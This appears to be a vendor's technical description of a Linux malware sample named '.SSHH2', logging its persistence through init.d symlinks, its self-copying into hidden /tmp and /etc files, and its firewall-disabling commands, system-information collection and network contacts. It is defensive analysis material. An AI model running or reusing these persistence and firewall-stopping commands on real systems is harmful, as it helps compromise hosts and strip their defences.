Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/init.d/.SSHH2
Creates or modifies the following symlinks:
- /etc/rc2.d/S77.SSHH2
- /etc/rc3.d/S77.SSHH2
- /etc/rc4.d/S77.SSHH2
- /etc/rc5.d/S77.SSHH2
Malicious functions:
Launches itself as a daemon
Modifies firewall settings:
- /etc/init.d/iptables stop
Manages services:
- systemctl stop iptables.service
- service iptables stop
- service .SSHH2 start
- systemctl start .SSHH2.service
- service ebtables stop
Launches processes:
- sh -c ps -ef
- ps -ef
- sh -c chmod 777 /etc/init.d/.SSHH2
- chmod 777 /etc/init.d/.SSHH2
- sh -c (chmod -R 777 /tmp) ; (rm -f /tmp/.sshhdd*) ; (echo yes|cp -p <SAMPLE_FULL_PATH> /tmp/.sshhdd1562763443)
- chmod -R 777 /tmp
- rm -f /tmp/.sshhdd*
- cp -p <SAMPLE_FULL_PATH> /tmp/.sshhdd1562763443
- sh -c (chmod +x /tmp/.sshhdd1562763443) ; (setsid /tmp/.sshhdd1562763443 &)
- chmod +x /tmp/.sshhdd1562763443
- setsid /tmp/.sshhdd1562763443
- /tmp/.sshhdd1562763443
- sh -c chkconfig --level 0123456 iptables off > /dev/null
- sh -c top -bn 1 | grep Cpu | cut -d \
- top -bn 1
- grep Cpu
- sh -c chkconfig --level 0123456 ip6tables off > /dev/null
- cut -d
- cut -d : -f 2
- sh -c systemctl stop iptables.service > /dev/null
- sh -c service iptables stop > /dev/null
- sh -c echo yes|cp -p /tmp/.sshhdd1562763443 /etc/.SSHH2
- cp -p /tmp/.sshhdd1562763443 /etc/.SSHH2
- sh -c grep \"\beth\" /proc/net/dev |cut -d \":\" -f 2 | awk '{print $9}'
- grep \beth /proc/net/dev
- awk {print $9}
- sh -c grep \"\beth\" /proc/net/dev |cut -d \":\" -f 2 | awk '{print $10}'
- awk {print $10}
- sh -c (chmod +x /etc/.SSHH2) ; (setsid /etc/.SSHH2 &)
- chmod +x /etc/.SSHH2
- setsid /etc/.SSHH2
- /etc/.SSHH2
- sh -c echo yes|cp -p <SAMPLE_FULL_PATH> /etc/.SSHH2
- cp -p <SAMPLE_FULL_PATH> /etc/.SSHH2
- sh -c chmod 777 /etc/.SSHH2
- chmod 777 /etc/.SSHH2
- sh -c ln -s /etc/init.d/.SSHH2 /etc/rc2.d/S77.SSHH2
- ln -s /etc/init.d/.SSHH2 /etc/rc2.d/S77.SSHH2
- sh -c ln -s /etc/init.d/.SSHH2 /etc/rc3.d/S77.SSHH2
- ln -s /etc/init.d/.SSHH2 /etc/rc3.d/S77.SSHH2
- sh -c ln -s /etc/init.d/.SSHH2 /etc/rc4.d/S77.SSHH2
- ln -s /etc/init.d/.SSHH2 /etc/rc4.d/S77.SSHH2
- sh -c ln -s /etc/init.d/.SSHH2 /etc/rc5.d/S77.SSHH2
- ln -s /etc/init.d/.SSHH2 /etc/rc5.d/S77.SSHH2
- sh -c service .SSHH2 start
- sh -c /etc/init.d/.SSHH2 start
- /etc/init.d/.SSHH2 start
- sh -c /etc/init.d/iptables stop > /dev/null
- sh -c reSuSEfirewall2 stop > /dev/null
- sh -c SuSEfirewall2 stop > /dev/null
- sh -c service ebtables stop > /dev/null
Kills the following processes:
- /tmp/.sshhdd1562763443
Performs operations with the file system:
Modifies file access rights:
- /tmp
- /tmp/.ICE-unix
- /tmp/.XIM-unix
- /tmp/.X11-unix
- /tmp/.Test-unix
- /tmp/.font-unix
- /tmp/.sshhdd1562763443
- /etc/.SSHH2
- /etc/init.d/.SSHH2
Creates or modifies files:
- /tmp/.sshhdd1562763443
- /etc/.SSHH2
Deletes files:
- /tmp/.sshhdd*
Network activity:
Establishes connection:
- 0.0.0.0:7668
DNS ASK:
- by.###k52088.com
Other:
Collects OS information
Collects CPU information
Collects RAM information
Collects information about network activity
